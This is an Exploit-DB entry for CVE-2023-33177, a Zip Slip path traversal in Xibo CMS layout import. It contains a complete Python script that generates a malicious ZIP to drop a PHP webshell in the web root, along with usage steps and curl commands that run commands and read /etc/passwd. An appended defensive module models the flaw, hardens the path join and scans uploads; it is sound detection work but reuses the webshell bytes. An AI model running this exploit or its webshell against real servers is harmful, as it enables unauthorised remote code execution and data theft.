[webapps] xibocms 3.3.4 - RCE
Xibo CMS 3.3.4 has a path traversal vulnerability (CVE-2023-33177) that lets an authenticated attacker upload arbitrary files and execute code by importing a malicious layout ZIP. The flaw stems from file paths in mapping.json that are not validated before extraction. Affected versions: 1.8.0-2.3.16 and 3.0.0-3.3.4. Fix by upgrading to 2.3.17+ or 3.3.5+. 2026-4-8 Author: www.exploit-db.com

# Exploit Title: XiboCMS 3.3.4 - Remote Code Execution
# Google Dork: N/A
# Date: 2025-11-18
# Exploit Author: complexusprada
# Vendor Homepage: https://xibo.org.uk/
# Software Link: https://github.com/xibosignage/xibo-cms
# Version: 1.8.0 - 2.3.16, 3.0.0 - 3.3.4
# Tested on: Ubuntu Linux (Docker), Xibo CMS 3.3.4
# CVE: CVE-2023-33177
# GHSA: GHSA-jj27-x85q-crqv
# Category: webapps

"""
# Vulnerability Description:
# Xibo CMS contains a path traversal vulnerability (Zip Slip) in the layout import
# functionality. The application fails to properly validate file paths in the mapping.json
# file within uploaded ZIP archives, allowing authenticated attackers to write files
# outside the intended library directory using path traversal sequences (../../).
# This results in arbitrary file upload and remote code execution.

# Exploitation Details:
# 1. Attacker creates a malicious ZIP file containing a valid Xibo layout structure
# 2. The mapping.json file contains a path traversal payload (../../web/shell.php)
# 3. A PHP webshell is placed at the corresponding path within the ZIP structure
# 4. When the layout is imported, Xibo extracts files without proper path validation
# 5. The webshell is written to the web root (/var/www/cms/web/shell.php)
# 6. Attacker gains remote code execution via the webshell

# Vulnerability Chain:
# ZIP contains:  library/../../web/shell.php
# Mapping.json:  {"file": "../../web/shell.php", ...}
# Xibo reads:    library/ + ../../web/shell.php
# Xibo writes:   /var/www/cms/library/temp/ + ../../web/shell.php
# Result:        /var/www/cms/web/shell.php (webshell in web root!)

# Prerequisites:
# - Valid Xibo CMS credentials (any authenticated user with layout import permission)
# - Xibo CMS versions 1.8.0 - 2.3.16 or 3.0.0 - 3.3.4

# Exploitation Steps:
# 1. Run this script to generate exploit.zip
# 2. Log in to Xibo CMS
# 3. Navigate to: Design → Layouts → Import
# 4. Upload the generated exploit.zip file
# 5. Even if JSON errors occur, the webshell has been written to disk
# 6. Access webshell at: http://<target>/shell.php?cmd=<command>
# Example: curl 'http://target/shell.php?cmd=id'

# Mitigation:
# Upgrade to patched versions:
# - Xibo CMS 2.3.17+ (for 2.x branch)
# - Xibo CMS 3.3.5+ (for 3.x branch)

# Disclaimer:
# This exploit is provided for educational purposes, authorized penetration testing,
# and vulnerability research only. Only use against systems you own or have explicit
# written permission to test.
"""

import zipfile
import json
import sys

def create_exploit():
    """Generate the malicious ZIP file for Xibo CMS RCE exploit"""

    print("[*] Xibo CMS Zip Slip RCE Exploit Generator")
    print("[*] CVE-2023-33177 - Path Traversal via Layout Import")
    print("[*] Affected: Xibo CMS 1.8.0-2.3.16, 3.0.0-3.3.4\n")

    # Valid Xibo 3.0 layout structure
    # This ensures the ZIP passes initial validation checks
    layout_json = {
        "layout": "Exploit Layout",
        "description": "Path Traversal Test",
        "layoutDefinitions": {
            "schemaVersion": 3,
            "width": 1920,
            "height": 1080,
            "backgroundColor": "#000000",
            "backgroundzIndex": 0,
            "code": "CVE-2023-33177",
            "actions": [],
            "regions": [],
            "drawers": []
        }
    }

    # Empty playlist - triggers JSON import code path
    playlist_json = {}

    # VULNERABILITY: Path traversal in mapping.json
    # The 'file' field is not properly sanitized before file extraction
    # Xibo constructs the extraction path as: library/temp/ + file['file']
    # Using ../../ allows escaping the library directory
    mapping_json = [{
        "file": "../../web/shell.php",  # Path traversal payload
        "name": "shell.php",
        "type": "module"
    }]

    # Simple PHP webshell for command execution
    # Accepts commands via GET parameter: ?cmd=<command>
    webshell = b'<?php system($_GET["cmd"]); ?>'

    # Create the malicious ZIP file
    try:
        with zipfile.ZipFile('exploit.zip', 'w', zipfile.ZIP_DEFLATED) as zf:
            # Add required Xibo layout files
            zf.writestr('layout.json', json.dumps(layout_json, indent=2))
            zf.writestr('playlist.json', json.dumps(playlist_json))
            zf.writestr('mapping.json', json.dumps(mapping_json))

            # CRITICAL: The file path in the ZIP must match what Xibo expects
            # Xibo calls: $zip->getStream('library/' . $file['file'])
            # Therefore we place the file at: library/../../web/shell.php
            zf.writestr('library/../../web/shell.php', webshell)

        print("[+] Exploit ZIP created successfully: exploit.zip")
        print("\n[*] Exploitation Steps:")
        print("    1. Log in to Xibo CMS with valid credentials")
        print("    2. Navigate to: Design → Layouts → Import")
        print("    3. Upload exploit.zip")
        print("    4. Ignore any JSON errors (file is already written)")
        print("    5. Access webshell: http://<target>/shell.php?cmd=<command>")
        print("\n[*] Example:")
        print("    curl 'http://target/shell.php?cmd=id'")
        print("    curl 'http://target/shell.php?cmd=cat%20/etc/passwd'")
        print()

    except Exception as e:
        print(f"[-] Error creating exploit: {e}", file=sys.stderr)
        sys.exit(1)

if __name__ == "__main__":
    create_exploit()
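The Vulnerability Chain above (library/temp/ + "../../web/shell.php") and the Mitigation section both come down to one missing check. The Python below is an added example and is not part of this exploit-db entry or the Xibo code base: it models the vulnerable concatenation, puts a hardened join next to it (my own suggested check, not the vendor's 2.3.17/3.3.5 patch, whose code this page does not show), and scans an archive shaped like exploit.zip for Zip Slip indicators before it reaches the importer. LIBRARY_TEMP is the deployment path assumed from the chain; build_sample constructs the inline test archives.

```python
import io
import json
import os
import zipfile

# Assumed deployment path, taken from the Vulnerability Chain above.
LIBRARY_TEMP = "/var/www/cms/library/temp/"


def vulnerable_target(mapping_file):
    """Extraction path as the vulnerable code effectively builds it: the temp
    directory concatenated with the untrusted 'file' value from mapping.json,
    which the filesystem then normalises (so '..' walks upward)."""
    return os.path.normpath(LIBRARY_TEMP + mapping_file)


def safe_target(mapping_file):
    """Hardened join (added suggestion, not the vendor's patch): reject empty,
    absolute or NUL-containing names and any '.'/'..'/empty segment, then
    confirm the resolved path still lies beneath the temp directory."""
    if not mapping_file or "\x00" in mapping_file or mapping_file.startswith(("/", "\\")):
        raise ValueError(f"empty, absolute or malformed name: {mapping_file!r}")
    segments = mapping_file.replace("\\", "/").split("/")
    if any(seg in ("", ".", "..") for seg in segments):
        raise ValueError(f"traversal segment in name: {mapping_file!r}")
    base = os.path.realpath(LIBRARY_TEMP)
    target = os.path.realpath(os.path.join(base, mapping_file))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"resolved path escapes temp dir: {target}")
    return target


def is_safe_name(mapping_file):
    """Boolean wrapper around safe_target for callers that only need a verdict."""
    try:
        safe_target(mapping_file)
    except ValueError:
        return False
    return True


def scan_layout_zip(data):
    """Inspect a layout archive (bytes) before import and return findings:
    entry names that escape the archive root, traversal in mapping.json, and
    server-side script files that have no place in a media library."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        for name in names:
            if name.startswith("/") or ".." in name.split("/"):
                findings.append(f"entry name escapes archive root: {name}")
            if name.lower().endswith((".php", ".phtml", ".phar")):
                findings.append(f"server-side script in archive: {name}")
        if "mapping.json" in names:
            for entry in json.loads(zf.read("mapping.json")):
                try:
                    safe_target(entry.get("file", ""))
                except ValueError as exc:
                    findings.append(f"mapping.json: {exc}")
    return findings


def build_sample(traversal):
    """Constructed sample archive: shaped like exploit.zip above when
    traversal=True, or a benign layout with one PNG asset when False."""
    file_name = "../../web/shell.php" if traversal else "logo.png"
    payload = b'<?php system($_GET["cmd"]); ?>' if traversal else b"\x89PNG\r\n\x1a\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("layout.json", json.dumps({"layout": "Sample"}))
        zf.writestr("mapping.json", json.dumps(
            [{"file": file_name, "name": file_name, "type": "module"}]))
        # zipfile stores the name literally, '..' included, exactly as exploit.zip does
        zf.writestr("library/" + file_name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    print("vulnerable join:", vulnerable_target("../../web/shell.php"))
    for label, data in (("malicious", build_sample(True)), ("benign", build_sample(False))):
        print(f"{label}: {scan_layout_zip(data) or 'no findings'}")
```

The segment check alone stops this exploit; the realpath/commonpath check is what catches variants the segment check does not anticipate (symlinks inside the temp directory, encodings the split does not normalise), which is why a hardened join keeps both. scan_layout_zip runs offline on an archive pulled from a web proxy or an upload quarantine, so it also serves a responder triaging a suspicious layout import.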

Source: https://www.exploit-db.com/exploits/52500